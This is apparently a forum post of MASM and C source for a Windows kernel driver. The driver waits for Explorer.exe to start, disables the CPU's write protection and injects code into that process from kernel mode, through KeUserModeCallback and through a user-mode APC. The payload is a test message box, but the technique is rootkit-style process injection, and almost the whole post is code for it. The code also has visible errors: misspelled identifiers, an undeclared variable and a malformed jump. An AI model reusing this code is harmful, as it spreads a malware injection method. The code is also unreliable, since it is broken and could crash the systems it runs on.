Код (Text): .386 .model flat, stdcall option casemap:none ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; I N C L U D E F I L E S ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: include \\masm32\\include\\w2k\\ntstatus.inc include \\masm32\\include\\w2k\\ntddk.inc include \\masm32\\include\\w2k\\ntoskrnl.inc includelib \\masm32\\lib\\w2k\\ntoskrnl.lib include \\masm32\\Macros\\Strings.mac include useful.asm ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; R E A D O N L Y D A T A ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .const CCOUNTED_UNICODE_STRING "\\\\Device\\\\ring3code", g_usDeviceName, 4 CCOUNTED_UNICODE_STRING "\\\\DosDevices\\\\ring3code", g_usSymbolicLinkName, 4 Target db "Explorer.exe",0 ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; U N I N I T I A L I Z E D D A T A ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .data? g_dwImageFileNameOffset DWORD ? g_fbNotifyRoutineSet BOOL ? szProcessName CHAR IMAGE_FILE_PATH_LEN dup(?) notAttack BOOL ? ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; C O D E ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .code ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; Myproc !!@!! I Just Code For Fan~~~ MayBe Error~~~ ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: myproc: ;please using Api Reloc before Call apiz ;even then u could restore kernel32.dll imagebase to ur code in ring0 bcz i got peb for u ~ ;i was just coding something here to test my code can go to ring3~ ;if it was call in ring0 it would crash down the system ~ but in ring3 all it would make a msgbox or ; an error for u to know code runs under ring3~ invoke MessageBox, hDlg, $CTA0("Sure want to exit?"), $CTA0("Exit Confirmation"), MB_YESNO + MB_ICONQUESTION + MB_DEFBUTTON1 retn length_myproc =$ - myproc ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; DisableWriteProtect ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: DisableWriteProtect proc Local uAttr:Dword push eax mov eax, cr0; mov uAttr, eax; and eax, 0FFFEFFFFh; // CR0 16 BIT = 0 mov cr0, eax; pop eax mov eax,uAttr ret DisableWriteProtect Endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; EnableWriteProtect ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: EnableWriteProtect proc uOldAttr:dword push eax; mov eax, uOldAttr mov cr0, eax; pop eax; ret 04h EnableWriteProtect endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; DispatchCreateClose ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP mov ecx, pIrp mov (_IRP PTR [ecx]).IoStatus.Status, STATUS_SUCCESS and (_IRP PTR [ecx]).IoStatus.Information, 0 fastcall IofCompleteRequest, ecx, IO_NO_INCREMENT mov eax, STATUS_SUCCESS ret DispatchCreateClose endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; GetUserPEB ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; out: eax - *peb GetUserPEB proc near assume fs:nothing push ebx mov ebx, dword ptr fs:[124h] mov eax, dword ptr [ebx+134h] ; gimme KTRAP_FRAME ; no ktrap_frame if called from kernel mode ; (from non user mode thread) test eax, eax jz GetUserPEB_End mov eax, dword ptr [ebx+44h] mov eax, dword ptr [eax+1b0h] ; peb for non user mode threadz null too test eax, eax GetUserPEB_end: pop ebx retn GetUserPEB endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; CallToUserMode ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: CallToUserMode proc lpPeb:PVOID, dwAddr:DWORD, dwSize:DWORD local kernel_callback_tableb:dword local ecx_on_return:dword local edx_on_return:dword local base_address:dword ; mov ecx_on_retrun,ecx ; mov edx_on_retrun,edx mov eax,lpPEB mov eax, dword ptr [eax+2ch] ; *KernelCallbackTable mov kernel_callback_table, eax and base_address, 0 push PAGE_READWRITE push MEM_COMMIT or MEM_TOP_DOWN or MEM_RESERVE lea eax, allocation_size mov allocation_size, (dwSize+1024) push eax lea eax, base_address push 0 push eax push -1 call NtAllocateVirtualMemory test eax, eax jnz CallToUserMode_End mov edx, base_address mov edi, edx push edi push esi mov esi, dwAddr; copy the to user-mode push dwSize pop ecx rep movsb pop esi pop edi mov eax, kernel_callback_table ;mov edx, base_address sub edx, eax shr edx, 2 lea ecx,ecx_on_return push ecx lea eax, edx_on_return push eax push 0 lea eax, edx_on_return push eax ;stack start ;where to start code user mode push edx call KeUserModeCallBack CallToUserMode_Free_Mem: push MEM_DECOMMIT mov eax, allocation_size push eax mov eax, base_address push eax push -1 call NtFreeVirtualMemory CallToUserMode_End: leave ret CallToUserMode endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; AttackProcess ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: AttackProcess proc pEpr:PVOID local oldArr:DWORD invoke KeAttachProcess,pEpr .if eax == STATUS_SUCCESS invoke DisableWriteProtect mov oldArr,eax invoke GetUserPEB jz Attack_End_err: invoke CallToUserMode, eax, addr myproc, length_myproc invoke EnableWriteProcect,oldArr invoke KeDetachProcess .endif Attack_End: mov eax, STATUS_SUCCESS Attack_End_err: ret AttackProcess endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; NotifyRoutine ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: NotifyRoutine proc dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL ; BOOLEAN local peProcess:PVOID ; PEPROCESS local fbDereference:BOOL local us:UNICODE_STRING local as:ANSI_STRING push eax ; reserve DWORD on stack invoke PsLookupProcessByProcessId, dwParentId, esp pop peProcess ; -> EPROCESS .if eax == STATUS_SUCCESS mov fbDereference, TRUE ; PsLookupProcessByProcessId references process object .else invoke PsLookupProcessByProcessId, dwProcessId, esp pop peProcess ; -> EPROCESS .if eax == STATUS_SUCCESS mov fbDereference, TRUE .else ret .endif .endif mov eax, bCreate invoke GetImageFilePath, peProcess, addr us .if eax == STATUS_SUCCESS lea eax, szProcessName mov as.Buffer, eax mov as.MaximumLength, IMAGE_FILE_PATH_LEN and as._Length, 0 invoke RtlUnicodeStringToAnsiString, addr as, addr us, FALSE invoke ExFreePool, us.Buffer lea eax, szProcessName invoke __strcmpi, eax, addr Target .if eax .if notAttacked invoke AttackProcess,peProcess .if eax == STATUS_SUCCESS mov notAttack,FALSE .endif .endif .endif .endif .if fbDereference fastcall ObfDereferenceObject, peProcess .endif ret NotifyRoutine endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; DispatchControl ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: DispatchControl proc uses esi edi pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP mov esi, pIrp assume esi:ptr _IRP ; Initialize to failure. mov [esi].IoStatus.Status, STATUS_UNSUCCESSFUL and [esi].IoStatus.Information, 0 IoGetCurrentIrpStackLocation esi mov edi, eax assume edi:ptr IO_STACK_LOCATION mov [esi].IoStatus.Status, STATUS_INVALID_DEVICE_REQUEST ; After IoCompleteRequest returns, the IRP pointer ; is no longer valid and cannot safely be dereferenced. push [esi].IoStatus.Status assume edi:nothing assume esi:nothing fastcall IofCompleteRequest, esi, IO_NO_INCREMENT pop eax ; [esi].IoStatus.Status ret DispatchControl endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; DriverUnload ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: DriverUnload proc pDriverObject:PDRIVER_OBJECT invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, TRUE invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName mov eax, pDriverObject invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject ret DriverUnload endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; D I S C A R D A B L E C O D E ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .code INIT ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; GetImageFileNameOffset ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: GetImageFileNameOffset proc uses esi ebx ; Finds EPROCESS.ImageFileName field offset ; W2K EPROCESS.ImageFileName = 01FCh ; WXP EPROCESS.ImageFileName = 0174h ; WNET EPROCESS.ImageFileName = 0154h ; Instead of hardcoding above offsets we just scan ; the EPROCESS structure of System process one page down. ; It\'s well-known trick. invoke IoGetCurrentProcess mov esi, eax xor ebx, ebx .while ebx < 1000h ; one page more than enough. ; Case insensitive compare. lea eax, [esi+ebx] invoke _strnicmp, eax, $CTA0("system"), 6 .break .if eax == 0 inc ebx .endw .if eax == 0 ; Found. mov eax, ebx .else ; Not found. xor eax, eax .endif ret GetImageFileNameOffset endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; DriverEntry ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING local status:NTSTATUS local pDeviceObject:PDEVICE_OBJECT mov status, STATUS_DEVICE_CONFIGURATION_ERROR invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, addr pDeviceObject .if eax == STATUS_SUCCESS invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName .if eax == STATUS_SUCCESS mov eax, pDriverObject assume eax:ptr DRIVER_OBJECT mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)], offset DispatchCreateClose mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)], offset DispatchCreateClose mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl mov [eax].DriverUnload, offset DriverUnload assume eax:nothing mov notAttack,FALSE and g_fbNotifyRoutineSet, FALSE invoke PsSetCreateProcessNotifyRoutine, NotifyRoutine, FALSE invoke GetImageFileNameOffset mov g_dwImageFileNameOffset, eax ; it can be not found and equal to 0, btw mov status, STATUS_SUCCESS .else invoke IoDeleteDevice, pDeviceObject .endif .endif mov eax, status ret DriverEntry endp VOID KeInitializeApc ( IN PRKAPC Apc, IN PRKTHREAD Thread, IN KAPC_ENVIRONMENT Environment, IN PKKERNEL_ROUTINE KernelRoutine, IN PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL, IN PKNORMAL_ROUTINE NormalRoutine OPTIONAL, IN KPROCESSOR_MODE ApcMode OPTIONAL IN PVOID NormalContext OPTIONAL ) .............. BOOLEAN KeInsertQueueApc ( IN PRKAPC Apc,//OurApc IN PVOID SystemArgument1,//Ring3App-arg2 IN PVOID SystemArgument2,//Ring3App-arg3 IN KPRIORITY Increment//0 ) Ring3:: void Ring3App(ulong arg1,ulong arg2,ulong arg3); kernel mode APC void MyApcRoutine(struct _KAPC *Apc, PKNORMAL_ROUTINE norm_routine, void *context,//arg1 void *SysArg1,//arg2 void *SysArg2)//arg3 { ExFreePool(Apc); return; } //in kernel mode PKAPC OurApc; void SendApc(ulong addr,ulong arg1,ulong arg2,ulong arg3) { PKTHREAD thread=KeGetCurrentThread(); OurApc=ExAllocatePool(NonPagedPool, sizeof(struct _KAPC)); KeInitializeApc(OurApc, thread, 0, (PKKERNEL_ROUTINE)&MyApcRoutine, 0, (PKNORMAL_ROUTINE)addr, 1, (PVOID)arg1); KeInsertQueueApc(OurApc, (PVOID)arg2, (PVOID)arg3, 0); *((unsigned char *)thread+0x4a)=1 return ; } //in user mode void Ring3App(ulong arg1,ulong arg2,ulong arg3) { .... } void SendQp(..) { .... SendBuf = BuildUpIrp(IRP_XXX_YYYY); SendBuf->BackAddr=(ULONG)Ring3App; .... ReturnBuf = SendIrp(hDevice,SendBuf,sizeof(SendBuf)); .... ....
